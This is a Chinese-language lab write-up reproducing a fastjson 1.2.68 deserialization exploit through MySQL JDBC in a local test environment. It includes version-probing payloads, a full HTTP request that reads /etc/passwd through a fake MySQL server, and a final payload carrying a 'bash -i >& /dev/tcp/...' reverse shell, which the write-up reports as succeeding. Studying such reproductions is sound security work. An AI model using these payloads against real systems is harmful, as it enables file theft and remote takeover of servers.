fastjson漏洞復現-1268-jdbc

1268-jdbc#

啟動環境，訪問站點，抓取登錄處的包

Pasted image 20250108144534

刪除右括號，報錯

Pasted image 20250108144612

報錯探測 fastjson 的版本

{
  "@type": "java.lang.AutoCloseable"

版本為 1.2.68

Pasted image 20250108144652

此環境可以配合 Mysql-JDBC 反序列化打 fastjson

參考查找 JDBC 依賴，不同的 mysql 版本依賴不一樣：

https://github.com/lemono0/FastJsonParty/blob/main/Fastjson%E5%85%A8%E7%89%88%E6%9C%AC%E6%A3%80%E6%B5%8B%E5%8F%8A%E5%88%A9%E7%94%A8-Poc.md

com.mysql.jdbc.Buffer  //mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider  //mysql-connect-6
com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8

Pasted image 20250108145016

Pasted image 20250108145045

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "com.mysql.cj.protocol.AuthenticationProvider
		}
	}

測試後判斷 mysql 的版本為 mysql-connect-8

根據作者 wp 可知 mysql-connect 的版本為 8 下限制條件很大，只有一個版本可用：8.0.19，而恰好這個環境 mysql-connect 的版本是 8.0.19

結合 https://github.com/fnmsd/MySQL_Fake_Server 工具進行利用

啟動 mysql fake server

Pasted image 20250108145423

嘗試文件讀取

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 869
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=ECE08E72ED63A0332C3FE78110ED7511
Connection: close

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "192.168.80.206"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.80.206",
                "user": "fileread_/etc/passwd",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

可讀取文件

Pasted image 20250108145946

使用作者提供的 ysoserial-0.0.6-SNAPSHOT-all.jar，然後上傳到和 Mysql-Fake-Server 下，server.py 可以直接讀取

Pasted image 20250108151214

最終腳本如下：

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "192.168.80.206"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.80.206",
                "user": "yso_FastJson1_bash -i >& /dev/tcp/192.168.80.206/1234 0>&1",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

發送 payload

Pasted image 20250108152425

返回 shell

Pasted image 20250108152509